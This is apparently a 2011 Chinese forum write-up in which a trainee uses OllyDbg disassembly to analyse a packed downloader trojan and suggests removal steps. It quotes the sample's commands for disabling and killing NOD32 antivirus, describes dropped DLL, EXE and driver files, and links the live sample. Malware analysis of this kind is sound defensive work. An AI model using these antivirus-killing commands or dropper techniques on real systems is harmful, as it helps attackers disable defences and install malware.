|
[文件]:1.v(为了防止允许改为.v后缀名,改为.exe后缀可允许) [文章标题]:对一个下载者的分析 [文章作者]:willjhw [作者邮箱]:466684954@qq.com [木马名称]:1.v [下载地址]:见附件 [分析环境]:windows xp sp3 [使用工具]:OD,PEID [详细过程]: 因为要为实习做准备,找老大要了一个样本来分析锻炼下自己,本人菜鸟,很多东西还不会,分析不当的地方还请各位多多指出。
老规矩,PEID查壳,如下图:
是一个UPX的壳,一个压缩壳,很简单的一个ESP可以脱掉,脱后养成好习惯修复下。 还是用OD分析吧,把脱壳后的载入OD。 00401F09 6A 00 push 0x0
00401F0B 68 50114000 push dump_.00401150 ; ASCII "notepad.exe"
00401F10 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
00401F16 68 C8000000 push 0xC8
00401F1B FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00401F21 6A 00 push 0x0
00401F23 68 48114000 push dump_.00401148 ; ASCII "Notepad"
00401F28 FF15 B0104000 call dword ptr ds:[<&user32.FindWindowA>>; user32.FindWindowA
00401F2E 85C0 test eax,eax
00401F30 74 10 je Xdump_.00401F42
00401F32 6A 00 push 0x0
00401F34 6A 00 push 0x0
00401F36 6A 10 push 0x10
00401F38 50 push eax
00401F39 FF15 B4104000 call dword ptr ds:[<&user32.SendMessageA>; user32.SendMessageA
00401F3F 33C0 xor eax,eax
00401F41 C3 retn
很神奇的打开了一个notepad, 然后关闭了这个notepad ,如果打开失败就关闭了自己(搞不懂为什么这么做,或许是检查杀毒软件?反虚拟机?maybe )。 00401D5A 83C4 0C add esp,0xC
00401D5D 8D85 B0FEFFFF lea eax,dword ptr ss:[ebp-0x150]
00401D63 50 push eax
00401D64 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401D6A 50 push eax
00401D6B FF15 50104000 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00401D71 8D85 A8FEFFFF lea eax,dword ptr ss:[ebp-0x158]
00401D77 50 push eax
00401D78 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401D7E 50 push eax
00401D7F FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401D85 8D85 94FEFFFF lea eax,dword ptr ss:[ebp-0x16C]
00401D8B 50 push eax
00401D8C 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401D92 50 push eax
00401D93 FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401D99 6A 00 push 0x0
00401D9B 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401DA1 50 push eax
00401DA2 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
用winexec运行cmd /c sc config ekrn start= disabled,这个的意思就是说禁用NOD32安全软件服务。 这个参数是动态写入堆栈的。 00401DE2 68 88130000 push 0x1388
00401DE7 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00401DED 8D45 D4 lea eax,dword ptr ss:[ebp-0x2C]
00401DF0 50 push eax
00401DF1 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401DF7 50 push eax
00401DF8 FF15 50104000 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00401DFE 8D45 F4 lea eax,dword ptr ss:[ebp-0xC]
00401E01 50 push eax
00401E02 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E08 50 push eax
00401E09 FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401E0F 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
00401E15 50 push eax
00401E16 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E1C 50 push eax
00401E1D FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401E23 6A 00 push 0x0
00401E25 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E2B 50 push eax
00401E2C FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
经过一个sleep,然后继续调用Winexec运行cmd.exe /c taskkill.exe /im ekrn.exe /f,这个的意思是说关闭NOD32安全软件进程。 00401E6C 68 88130000 push 0x1388
00401E71 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00401E77 8D45 D4 lea eax,dword ptr ss:[ebp-0x2C]
00401E7A 50 push eax
00401E7B 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E81 50 push eax
00401E82 FF15 50104000 call dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00401E88 8D85 C4FEFFFF lea eax,dword ptr ss:[ebp-0x13C]
00401E8E 50 push eax
00401E8F 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401E95 50 push eax
00401E96 FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401E9C 8D85 D0FEFFFF lea eax,dword ptr ss:[ebp-0x130]
00401EA2 50 push eax
00401EA3 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401EA9 50 push eax
00401EAA FF15 4C104000 call dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
00401EB0 6A 00 push 0x0
00401EB2 8D85 D4FEFFFF lea eax,dword ptr ss:[ebp-0x12C]
00401EB8 50 push eax
00401EB9 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
又是一个sleep,然后继续调用WinExec去允许cmd.exe /c taskkill.exe /im egui.exe /f,这个的意思是说关闭NOD32安全软件进程。看来这个马对NOD32很有爱啊,把别人全关了。 0040145A 6A 00 push 0x0
0040145C 6A 00 push 0x0
0040145E 6A 02 push 0x2
00401460 6A 00 push 0x0
00401462 6A 00 push 0x0
00401464 68 00000040 push 0x40000000
00401469 FF75 08 push dword ptr ss:[ebp+0x8]
0040146C FF15 1C104000 call dword ptr ds:[<&kernel32.CreateFile>; kernel32.CreateFileA
00401472 8945 F0 mov dword ptr ss:[ebp-0x10],eax
00401475 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00401478 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040147B 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040147F 0F84 9D000000 je dump_.00401522
00401485 FF75 10 push dword ptr ss:[ebp+0x10]
00401488 FF75 0C push dword ptr ss:[ebp+0xC]
0040148B 6A 00 push 0x0
0040148D FF15 18104000 call dword ptr ds:[<&kernel32.FindResour>; kernel32.FindResourceA
00401493 8945 E8 mov dword ptr ss:[ebp-0x18],eax
00401496 8B45 E8 mov eax,dword ptr ss:[ebp-0x18]
00401499 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0040149C FF75 E8 push dword ptr ss:[ebp-0x18]
0040149F 6A 00 push 0x0
004014A1 FF15 14104000 call dword ptr ds:[<&kernel32.LoadResour>; kernel32.LoadResource
004014A7 8945 DC mov dword ptr ss:[ebp-0x24],eax
004014AA 8B45 DC mov eax,dword ptr ss:[ebp-0x24]
004014AD 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004014B0 8365 D8 00 and dword ptr ss:[ebp-0x28],0x0
004014B4 FF75 DC push dword ptr ss:[ebp-0x24]
004014B7 FF15 10104000 call dword ptr ds:[<&kernel32.LockResour>; kernel32.SetHandleCount
004014BD 8945 EC mov dword ptr ss:[ebp-0x14],eax
004014C0 8065 FC 00 and byte ptr ss:[ebp-0x4],0x0
004014C4 90 nop
004014C5 FF75 E4 push dword ptr ss:[ebp-0x1C]
004014C8 6A 00 push 0x0
004014CA FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
004014D0 85C0 test eax,eax
004014D2 74 3C je Xdump_.00401510
004014D4 90 nop
004014D5 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
004014D8 0345 D8 add eax,dword ptr ss:[ebp-0x28]
004014DB 0FB600 movzx eax,byte ptr ds:[eax]
004014DE 83C0 05 add eax,0x5
004014E1 8845 FC mov byte ptr ss:[ebp-0x4],al
004014E4 6A 00 push 0x0
004014E6 8D45 E0 lea eax,dword ptr ss:[ebp-0x20]
004014E9 50 push eax
004014EA 6A 01 push 0x1
004014EC 8D45 FC lea eax,dword ptr ss:[ebp-0x4]
004014EF 50 push eax
004014F0 FF75 F4 push dword ptr ss:[ebp-0xC]
004014F3 FF15 08104000 call dword ptr ds:[<&kernel32.WriteFile>>; kernel32.WriteFile
004014F9 8B45 D8 mov eax,dword ptr ss:[ebp-0x28]
004014FC 40 inc eax
004014FD 8945 D8 mov dword ptr ss:[ebp-0x28],eax
00401500 FF75 E4 push dword ptr ss:[ebp-0x1C]
00401503 6A 00 push 0x0
00401505 FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
0040150B 3945 D8 cmp dword ptr ss:[ebp-0x28],eax
0040150E ^ 72 C5 jb Xdump_.004014D5
00401510 FF75 F8 push dword ptr ss:[ebp-0x8]
00401513 FF15 04104000 call dword ptr ds:[<&kernel32.FreeResour>; kernel32.FreeResource
00401519 FF75 F4 push dword ptr ss:[ebp-0xC]
0040151C FF15 00104000 call dword ptr ds:[<&kernel32.CloseHandl>; kernel32.CloseHandle
这里有一个释放文件的过程了,在C:\WINDOWS下释放了一个tete8969843t.dll,我们把它抓出来,假如等会儿被删除了不好。 00402308 6A 05 push 0x5
0040230A 8D85 30F6FFFF lea eax,dword ptr ss:[ebp-0x9D0]
00402310 50 push eax
00402311 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
调用WinExec去允许Rundll32.exe去装载刚才释放的那个tete8969843t.dll。 00402351 68 50460000 push 0x4650
00402356 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
0040235C 68 E8030000 push 0x3E8
00402361 FF15 28104000 call dword ptr ds:[<&kernel32.Sleep>] ; kernel32.Sleep
00402367 8D85 D8FCFFFF lea eax,dword ptr ss:[ebp-0x328]
0040236D 50 push eax
0040236E FF15 24104000 call dword ptr ds:[<&kernel32.DeleteFile>; kernel32.DeleteFileA
两个sleep后调用了DeleteFileA去删除了这个dll,还有有保存。 0040145A 6A 00 push 0x0
0040145C 6A 00 push 0x0
0040145E 6A 02 push 0x2
00401460 6A 00 push 0x0
00401462 6A 00 push 0x0
00401464 68 00000040 push 0x40000000
00401469 FF75 08 push dword ptr ss:[ebp+0x8]
0040146C FF15 1C104000 call dword ptr ds:[<&kernel32.CreateFile>; kernel32.CreateFileA
00401472 8945 F0 mov dword ptr ss:[ebp-0x10],eax
00401475 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00401478 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040147B 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040147F 0F84 9D000000 je dump_.00401522
00401485 FF75 10 push dword ptr ss:[ebp+0x10]
00401488 FF75 0C push dword ptr ss:[ebp+0xC]
0040148B 6A 00 push 0x0
0040148D FF15 18104000 call dword ptr ds:[<&kernel32.FindResour>; kernel32.FindResourceA
00401493 8945 E8 mov dword ptr ss:[ebp-0x18],eax
00401496 8B45 E8 mov eax,dword ptr ss:[ebp-0x18]
00401499 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0040149C FF75 E8 push dword ptr ss:[ebp-0x18]
0040149F 6A 00 push 0x0
004014A1 FF15 14104000 call dword ptr ds:[<&kernel32.LoadResour>; kernel32.LoadResource
004014A7 8945 DC mov dword ptr ss:[ebp-0x24],eax
004014AA 8B45 DC mov eax,dword ptr ss:[ebp-0x24]
004014AD 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004014B0 8365 D8 00 and dword ptr ss:[ebp-0x28],0x0
004014B4 FF75 DC push dword ptr ss:[ebp-0x24]
004014B7 FF15 10104000 call dword ptr ds:[<&kernel32.LockResour>; kernel32.SetHandleCount
004014BD 8945 EC mov dword ptr ss:[ebp-0x14],eax
004014C0 8065 FC 00 and byte ptr ss:[ebp-0x4],0x0
004014C4 90 nop
004014C5 FF75 E4 push dword ptr ss:[ebp-0x1C]
004014C8 6A 00 push 0x0
004014CA FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
004014D0 85C0 test eax,eax
004014D2 74 3C je Xdump_.00401510
004014D4 90 nop
004014D5 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
004014D8 0345 D8 add eax,dword ptr ss:[ebp-0x28]
004014DB 0FB600 movzx eax,byte ptr ds:[eax]
004014DE 83C0 05 add eax,0x5
004014E1 8845 FC mov byte ptr ss:[ebp-0x4],al
004014E4 6A 00 push 0x0
004014E6 8D45 E0 lea eax,dword ptr ss:[ebp-0x20]
004014E9 50 push eax
004014EA 6A 01 push 0x1
004014EC 8D45 FC lea eax,dword ptr ss:[ebp-0x4]
004014EF 50 push eax
004014F0 FF75 F4 push dword ptr ss:[ebp-0xC]
004014F3 FF15 08104000 call dword ptr ds:[<&kernel32.WriteFile>>; kernel32.WriteFile
004014F9 8B45 D8 mov eax,dword ptr ss:[ebp-0x28]
004014FC 40 inc eax
004014FD 8945 D8 mov dword ptr ss:[ebp-0x28],eax
00401500 FF75 E4 push dword ptr ss:[ebp-0x1C]
00401503 6A 00 push 0x0
00401505 FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; kernel32.SizeofResource
0040150B 3945 D8 cmp dword ptr ss:[ebp-0x28],eax
0040150E ^ 72 C5 jb Xdump_.004014D5
00401510 FF75 F8 push dword ptr ss:[ebp-0x8]
00401513 FF15 04104000 call dword ptr ds:[<&kernel32.FreeResour>; kernel32.FreeResource
00401519 FF75 F4 push dword ptr ss:[ebp-0xC]
0040151C FF15 00104000 call dword ptr ds:[<&kernel32.CloseHandl>; kernel32.CloseHandle
又一次释放了文件,在C:\WINDOWS下释放了一个extext9393312t.exe,我们同样抓出来。 00402448 6A 00 push 0x0
0040244A 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-0x218]
00402450 50 push eax
00402451 FF15 60104000 call dword ptr ds:[<&kernel32.WinExec>] ; kernel32.WinExec
调用了WinExec去运行刚释放的那个extext9393312t.exe 00402869 . 50 push eax ; /FileName
0040286A . FF15 70104000 call dword ptr ds:[<&kernel32.LoadLibrar>; \LoadLibraryA
导入了advapi32.dll,说明这个马儿要对注册表做操作。 004028B6 . 50 push eax ; /ProcNameOrOrdinal
004028B7 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
004028BD . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
004028C3 . A3 DC104000 mov dword ptr ds:[0x4010DC],eax
004028C8 . 8D85 8CF9FFFF lea eax,dword ptr ss:[ebp-0x674]
004028CE . 50 push eax ; /ProcNameOrOrdinal
004028CF . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
004028D5 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
004028DB . A3 D8104000 mov dword ptr ds:[0x4010D8],eax
004028E0 . 8D85 C8FAFFFF lea eax,dword ptr ss:[ebp-0x538]
004028E6 . 50 push eax ; /ProcNameOrOrdinal
004028E7 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
004028ED . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
004028F3 . A3 D4104000 mov dword ptr ds:[0x4010D4],eax
004028F8 . 8D85 C0F2FFFF lea eax,dword ptr ss:[ebp-0xD40]
004028FE . 50 push eax ; /ProcNameOrOrdinal
004028FF . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
00402905 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
0040290B . A3 D0104000 mov dword ptr ds:[0x4010D0],eax
00402910 . 8D85 58F8FFFF lea eax,dword ptr ss:[ebp-0x7A8]
00402916 . 50 push eax ; /ProcNameOrOrdinal
00402917 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
0040291D . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
00402923 . A3 CC104000 mov dword ptr ds:[0x4010CC],eax
00402928 . 8D85 34F7FFFF lea eax,dword ptr ss:[ebp-0x8CC]
0040292E . 50 push eax ; /ProcNameOrOrdinal
0040292F . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
00402935 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
0040293B . A3 C8104000 mov dword ptr ds:[0x4010C8],eax
00402940 . 8D85 68F8FFFF lea eax,dword ptr ss:[ebp-0x798]
00402946 . 50 push eax ; /ProcNameOrOrdinal
00402947 . FFB5 44F7FFFF push dword ptr ss:[ebp-0x8BC] ; |hModule
0040294D . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
全是一堆获取服务地址相关的操作。 00402A08 . 50 push eax ; /FileName
00402A09 . FF15 70104000 call dword ptr ds:[<&kernel32.LoadLibrar>; \LoadLibraryA
00402A0F . 8985 88F8FFFF mov dword ptr ss:[ebp-0x778],eax
00402A15 . 8D85 78F8FFFF lea eax,dword ptr ss:[ebp-0x788]
00402A1B . 50 push eax ; /ProcNameOrOrdinal
00402A1C . FFB5 88F8FFFF push dword ptr ss:[ebp-0x778] ; |hModule
00402A22 . FF15 6C104000 call dword ptr ds:[<&kernel32.GetProcAdd>; \GetProcAddress
导入了Kernel32.dll,然后获取了DeviceIoControl的地址,说明有驱动的操作这也与前面的服务有关。 00401459 . 61 popad
0040145A . 6A 00 push 0x0 ; /hTemplateFile = NULL
0040145C . 6A 00 push 0x0 ; |Attributes = 0
0040145E . 6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401460 . 6A 00 push 0x0 ; |pSecurity = NULL
00401462 . 6A 00 push 0x0 ; |ShareMode = 0
00401464 . 68 00000040 push 0x40000000 ; |Access = GENERIC_WRITE
00401469 . FF75 08 push dword ptr ss:[ebp+0x8] ; |FileName
0040146C . FF15 1C104000 call dword ptr ds:[<&kernel32.CreateFile>; \CreateFileA
00401472 . 8945 F0 mov dword ptr ss:[ebp-0x10],eax
00401475 . 8B45 F0 mov eax,dword ptr ss:[ebp-0x10]
00401478 . 8945 F4 mov dword ptr ss:[ebp-0xC],eax
0040147B . 837D F0 00 cmp dword ptr ss:[ebp-0x10],0x0
0040147F . 0F84 9D000000 je dump_.00401522
00401485 . FF75 10 push dword ptr ss:[ebp+0x10] ; /ResourceType
00401488 . FF75 0C push dword ptr ss:[ebp+0xC] ; |ResourceName
0040148B . 6A 00 push 0x0 ; |hModule = NULL
0040148D . FF15 18104000 call dword ptr ds:[<&kernel32.FindResour>; \FindResourceA
00401493 . 8945 E8 mov dword ptr ss:[ebp-0x18],eax
00401496 . 8B45 E8 mov eax,dword ptr ss:[ebp-0x18]
00401499 . 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
0040149C . FF75 E8 push dword ptr ss:[ebp-0x18] ; /hResource
0040149F . 6A 00 push 0x0 ; |hModule = NULL
004014A1 . FF15 14104000 call dword ptr ds:[<&kernel32.LoadResour>; \LoadResource
004014A7 . 8945 DC mov dword ptr ss:[ebp-0x24],eax
004014AA . 8B45 DC mov eax,dword ptr ss:[ebp-0x24]
004014AD . 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004014B0 . 8365 D8 00 and dword ptr ss:[ebp-0x28],0x0
004014B4 . FF75 DC push dword ptr ss:[ebp-0x24] ; /nHandles
004014B7 . FF15 10104000 call dword ptr ds:[<&kernel32.LockResour>; \SetHandleCount
004014BD . 8945 EC mov dword ptr ss:[ebp-0x14],eax
004014C0 . 8065 FC 00 and byte ptr ss:[ebp-0x4],0x0
004014C4 . 90 nop
004014C5 . FF75 E4 push dword ptr ss:[ebp-0x1C] ; /hResource
004014C8 . 6A 00 push 0x0 ; |hModule = NULL
004014CA . FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; \SizeofResource
004014D0 . 85C0 test eax,eax
004014D2 . 74 3C je Xdump_.00401510
004014D4 . 90 nop
004014D5 > 8B45 EC mov eax,dword ptr ss:[ebp-0x14]
004014D8 . 0345 D8 add eax,dword ptr ss:[ebp-0x28]
004014DB . 0FB600 movzx eax,byte ptr ds:[eax]
004014DE . 83C0 05 add eax,0x5
004014E1 . 8845 FC mov byte ptr ss:[ebp-0x4],al
004014E4 . 6A 00 push 0x0 ; /pOverlapped = NULL
004014E6 . 8D45 E0 lea eax,dword ptr ss:[ebp-0x20] ; |
004014E9 . 50 push eax ; |pBytesWritten
004014EA . 6A 01 push 0x1 ; |nBytesToWrite = 1
004014EC . 8D45 FC lea eax,dword ptr ss:[ebp-0x4] ; |
004014EF . 50 push eax ; |Buffer
004014F0 . FF75 F4 push dword ptr ss:[ebp-0xC] ; |hFile
004014F3 . FF15 08104000 call dword ptr ds:[<&kernel32.WriteFile>>; \WriteFile
004014F9 . 8B45 D8 mov eax,dword ptr ss:[ebp-0x28]
004014FC . 40 inc eax
004014FD . 8945 D8 mov dword ptr ss:[ebp-0x28],eax
00401500 . FF75 E4 push dword ptr ss:[ebp-0x1C] ; /hResource
00401503 . 6A 00 push 0x0 ; |hModule = NULL
00401505 . FF15 0C104000 call dword ptr ds:[<&kernel32.SizeofReso>; \SizeofResource
0040150B . 3945 D8 cmp dword ptr ss:[ebp-0x28],eax
0040150E .^ 72 C5 jb Xdump_.004014D5
00401510 > FF75 F8 push dword ptr ss:[ebp-0x8] ; /hResource
00401513 . FF15 04104000 call dword ptr ds:[<&kernel32.FreeResour>; \FreeResource
00401519 . FF75 F4 push dword ptr ss:[ebp-0xC] ; /hObject
0040151C . FF15 00104000 call dword ptr ds:[<&kernel32.CloseHandl>; \CloseHandle
又是一个释放文件的过程,这次在C:\WINDOWS\system32\drivers下释放了一个驱动文件pcidump.sys。 00401597 . 6A 00 push 0x0
00401599 . 6A 00 push 0x0
0040159B . 6A 00 push 0x0
0040159D . 6A 00 push 0x0
0040159F . 6A 00 push 0x0
004015A1 . FF75 08 push dword ptr ss:[ebp+0x8]
004015A4 . 6A 00 push 0x0
004015A6 . 6A 03 push 0x3
004015A8 . 6A 01 push 0x1
004015AA . 68 FF010F00 push 0xF01FF
004015AF . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015B4 . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015B9 . FF75 FC push dword ptr ss:[ebp-0x4]
004015BC . FF15 D4104000 call dword ptr ds:[0x4010D4] ; advapi32.CreateServiceA
004015C2 . 8945 C8 mov dword ptr ss:[ebp-0x38],eax
004015C5 . 837D C8 00 cmp dword ptr ss:[ebp-0x38],0x0
004015C9 . 75 79 jnz Xdump_.00401644
004015CB . 68 FF010F00 push 0xF01FF
004015D0 . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
004015D5 . FF75 F4 push dword ptr ss:[ebp-0xC]
004015D8 . FF15 DC104000 call dword ptr ds:[0x4010DC] ; advapi32.OpenServiceA
004015DE . 8945 D4 mov dword ptr ss:[ebp-0x2C],eax
004015E1 . 8B45 D4 mov eax,dword ptr ss:[ebp-0x2C]
004015E4 . 8945 F8 mov dword ptr ss:[ebp-0x8],eax
004015E7 . 837D D4 00 cmp dword ptr ss:[ebp-0x2C],0x0
004015EB . 74 21 je Xdump_.0040160E
004015ED . 8D45 D8 lea eax,dword ptr ss:[ebp-0x28]
004015F0 . 50 push eax
004015F1 . 6A 01 push 0x1
004015F3 . FF75 D4 push dword ptr ss:[ebp-0x2C]
004015F6 . FF15 D8104000 call dword ptr ds:[0x4010D8] ; advapi32.ControlService
004015FC . FF75 F8 push dword ptr ss:[ebp-0x8]
004015FF . FF15 CC104000 call dword ptr ds:[0x4010CC] ; advapi32.DeleteService
00401605 . FF75 F8 push dword ptr ss:[ebp-0x8]
00401608 . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
0040160E > 6A 00 push 0x0
00401610 . 6A 00 push 0x0
00401612 . 6A 00 push 0x0
00401614 . 6A 00 push 0x0
00401616 . 6A 00 push 0x0
00401618 . FF75 08 push dword ptr ss:[ebp+0x8]
0040161B . 6A 00 push 0x0
0040161D . 6A 03 push 0x3
0040161F . 6A 01 push 0x1
00401621 . 68 FF010F00 push 0xF01FF
00401626 . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
0040162B . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
00401630 . FF75 F4 push dword ptr ss:[ebp-0xC]
00401633 . FF15 D4104000 call dword ptr ds:[0x4010D4] ; advapi32.CreateServiceA
00401639 . 8945 C8 mov dword ptr ss:[ebp-0x38],eax
0040163C . 837D C8 00 cmp dword ptr ss:[ebp-0x38],0x0
00401640 . 75 02 jnz Xdump_.00401644
00401642 . EB 6F jmp Xdump_.004016B3
00401644 > FF75 C8 push dword ptr ss:[ebp-0x38]
00401647 . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
0040164D . 6A 10 push 0x10
0040164F . 68 18114000 push dump_.00401118 ; ASCII "pcidump"
00401654 . FF75 F4 push dword ptr ss:[ebp-0xC]
00401657 . FF15 DC104000 call dword ptr ds:[0x4010DC] ; advapi32.OpenServiceA
0040165D . 8945 C0 mov dword ptr ss:[ebp-0x40],eax
00401660 . 8B45 C0 mov eax,dword ptr ss:[ebp-0x40]
00401663 . 8945 CC mov dword ptr ss:[ebp-0x34],eax
00401666 . 837D C0 00 cmp dword ptr ss:[ebp-0x40],0x0
0040166A . 74 25 je Xdump_.00401691
0040166C . 6A 00 push 0x0
0040166E . 6A 00 push 0x0
00401670 . FF75 C0 push dword ptr ss:[ebp-0x40]
00401673 . FF15 C8104000 call dword ptr ds:[0x4010C8] ; advapi32.StartServiceA
00401679 . 85C0 test eax,eax
0040167B . 75 09 jnz Xdump_.00401686
0040167D . FF15 20104000 call dword ptr ds:[<&kernel32.GetLastErr>; [GetLastError
00401683 . 8945 D0 mov dword ptr ss:[ebp-0x30],eax
00401686 > FF75 CC push dword ptr ss:[ebp-0x34]
00401689 . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
0040168F . EB 09 jmp Xdump_.0040169A
00401691 > FF15 20104000 call dword ptr ds:[<&kernel32.GetLastErr>; [GetLastError
00401697 . 8945 D0 mov dword ptr ss:[ebp-0x30],eax
0040169A > FF75 F4 push dword ptr ss:[ebp-0xC]
0040169D . FF15 D0104000 call dword ptr ds:[0x4010D0] ; advapi32.CloseServiceHandle
004016A3 . EB 09 jmp Xdump_.004016AE
004016A5 > FF15 20104000 call dword ptr ds:[<&kernel32.GetLastErr>; [GetLastError
这里一系列的服务操作来加载了刚才释放的那个pcidump.sys。
00401763 FF75 08 push dword ptr ss:[ebp+0x8]
00401766 FF15 24104000 call dword ptr ds:[<&kernel32.DeleteFile>; kernel32.DeleteFileA
做完操作后删除了这个驱动文件。 00402E46 6A 01 push 0x1
00402E48 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-0x104]
00402E4E 50 push eax
00402E4F 8D85 8CF8FFFF lea eax,dword ptr ss:[ebp-0x774]
00402E55 50 push eax
00402E56 FF15 64104000 call dword ptr ds:[<&kernel32.MoveFileEx>; kernel32.MoveFileExA
将自己重命名为scvhost.exe并移动到c:\windows\system32下面,最后程序退出,
接着我将刚抓取的dll很简单的分析了下,主要功能应该是劫持了注册表,强行结束大量杀毒软件进程。
然后将那个exe简单分析了下,调用了一个userinit.exe,然后去站点下载txt,由于站点已经失效了,所以下载失败,后面下载后应该会有更多的操作,下载失败了我就没有去分析了。
对于userinit.exe感觉和上面的那个exe的功能差不多的呢。
还有一个驱动文件,由于本人对于驱动还处于一个打印一个hello world的阶段,所以严重的不会啊,不过我猜想也就是保护这个软件吧。
好啦,分析得差不多啦,现在来总结下吧。
从行为来看这个是一个下载者,它运行首先会开一个记事本,如果打开失败就挂了自己,很奇怪(以前见过有人这么做去试探杀软的虚拟机),然后关闭了NOD32的进程和服务,接着释放了一个dll,并加装它,这个dll主要是劫持了注册表,强行结束大量杀毒软件进程。然后释放了一个exe,大概作用就是一个下载,因为站点失效了,我也不知道下载了什么。还释放了一个驱动文件并且加载了。最后将自己拷贝到c:\windows\system32下取名字为scvhost.exe(是不是很像svchost呀)。
最后说下自己提的解决方案吧。
1.
首先介绍病毒进程。 2.
强行删除c:\windows\system32下的scvhost文件。 3.
强行删除该木马释放的多个文件(或许它作了自己删除)。 4.
调用杀毒软件进行全面查杀。 病毒附近:
1.rar
(32.98 KB, 下载次数: 34)
解压密码:52pojie
|
[复制链接]
发表于 2011-12-18 11:06
发表于 2011-12-18 11:37
|
发表于 2011-12-18 11:54
